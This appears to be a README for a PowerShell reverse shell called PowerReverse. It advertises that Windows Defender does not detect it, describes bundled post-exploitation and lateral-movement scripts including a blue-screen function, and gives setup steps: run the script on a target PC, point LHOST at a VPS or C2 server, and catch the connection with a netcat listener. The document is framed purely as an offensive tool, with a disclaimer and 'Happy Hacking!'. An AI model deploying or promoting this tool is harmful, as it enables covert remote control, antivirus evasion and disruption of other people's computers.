This is a powershell reverse shell that executes the commands and or scripts that you add to the powerreverse.ps1 file as well as a small library of Post-Exploitation scripts. This also can be used for post exploitation and lateral movement even. Please use at your own risk I am not and will not be responsible for your actions. Also this reverse shell currently is not detected by Windows Defender. If you want to use this make sure to setup a Digital Ocean VPS and have the script connect back there or your C2. Happy Hacking!
To run this application, you’ll need the powerreverse.ps1 file executed on target pc.
# Install This Repository $ Download The Code By Pressing Download ZIP # Clone this repository $ git clone # Take One Of The Functions Like This & Copy Paste Into PowerReverse $ You Will See The Screenshot Below Has The PowerReverse file and inside I added the BSOD.ps1 function that I copy pasted inside of the powerreverse.ps1 so that we can call & use it when we execute on target PC. You can mix & match what features you want in the reverse shell just make sure there is no references right above the function call it will say references and if it says 0 you are fine if it says 1 or more simply change the function name. When reverse shell executes and you want to execute a specific feature simply call the function name and in our case inside the VPS simply type bsod and it will execute it or whateber you named the function! # Change The LHOST & LPORT Inside Of The PowerReverse File $LHOST = "YOUR C2 IP" $LPORT = #Your Port Without Quotations # Start A Netcat Listener Or Your Own Implementation Of A Listener On VPS Or C2 & Enjoy! $ nc -l -p <port you chose> (Just A Netcat Listener In Your VPS Not Needed If You Use Another Method!)
You can download the code from the top right, it will give you all the code needed in a ZIP file.
If you want to discuss any topics or need some help I am very active and can get back to you within 24 hours or less And Setup A Date & Time To Help With Whatever It Is You Need, I Am Also Open To Collab On Projects I Feel Are Worth My Time And Of My Interest As Well!!
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